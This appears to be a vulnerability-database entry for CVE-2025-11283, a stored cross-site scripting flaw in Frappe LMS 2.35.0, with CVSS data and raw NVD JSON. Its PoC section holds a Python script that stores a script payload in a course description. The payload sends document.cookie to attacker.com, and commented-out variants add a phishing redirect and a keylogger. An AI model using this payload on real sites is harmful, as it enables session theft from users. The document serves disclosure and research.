Security Vulnerability Report
CVE-2025-11283 CVSS 2.4 LOW

CVE-2025-11283

Published: 2025-10-05 05:15:32
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in Frappe LMS 2.35.0. It affects an unknown function of the Course Handler component. Manipulating the Description argument can lead to cross-site scripting. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used. Upgrading the affected component is suggested. The vendor was informed early about a total of four security issues and confirmed that they have been fixed. However, the release notes on GitHub do not mention them.

CVSS Details

CVSS Score: 2.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:* - VULNERABLE
Frappe LMS 2.35.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11283 - Frappe LMS 2.35.0 Stored XSS PoC
# Vulnerability: Stored XSS in Course Handler - Description parameter
# Author: 0xHamy
# Reference: https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da

import requests

# Target configuration
TARGET_URL = "https://target-frappe-lms.com"
SESSION_COOKIE = "your_session_cookie_here"  # Requires admin/high-privilege session

# Step 1: Authenticate and obtain session (if not already authenticated)
session = requests.Session()
session.cookies.set("sid", SESSION_COOKIE)

# Step 2: Craft malicious payload for the Description field
# The payload will execute JavaScript in the victim's browser context
xss_payload = """
<div class="course-description">
    <h2>Welcome to the Course</h2>
    <script>
        // Steal session cookies and send to attacker's server
        fetch('https://attacker.com/steal?cookie=' + document.cookie);
        // Alternative: Redirect to phishing page
        // window.location = 'https://attacker.com/phishing';
        // Alternative: Keylogger
        // document.addEventListener('keypress', function(e) {
        //     fetch('https://attacker.com/log?key=' + e.key);
        // });
    </script>
    <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
</div>
"""

# Step 3: Send the malicious course description via Course Handler API
course_data = {
    "title": "Introduction to Security",
    "description": xss_payload,
    "category": "Security",
    "instructor": "admin"
}

# Step 4: Submit the crafted payload
response = session.post(
    f"{TARGET_URL}/api/method/lms.lms.doctype.lms_course.lms_course.create_course",
    json=course_data,
    headers={
        "Content-Type": "application/json",
        "X-Frappe-CSRF-Token": "your_csrf_token_here"
    }
)

# Step 5: Verify the payload was stored
if response.status_code == 200:
    print(f"[+] XSS payload successfully stored in course description")
    print(f"[+] Course ID: {response.json().get('message', {}).get('name')}")
    print(f"[+] When a victim views this course, the script will execute")
else:
    print(f"[-] Failed to store payload: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Steps to Reproduce (Manual):
# 1. Login to Frappe LMS as an admin or user with course creation privileges
# 2. Navigate to Course creation/editing page
# 3. In the Description field, inject: <script>alert(document.cookie)</script>
# 4. Save the course
# 5. When any user (including unauthenticated viewers) accesses the course page,
#    the JavaScript will execute in their browser context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11283", "sourceIdentifier": "[email protected]", "published": "2025-10-05T05:15:31.500", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Frappe LMS 2.35.0. This affects an unknown function of the component Course Handler. Executing manipulation of the argument Description can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. It is suggested to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4798441-F3FA-420C-B28E-7DB3096A2A2B"}]}]}], "references": [{"url": "https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da#steps-to-reproduce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327017", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327017", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659697", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}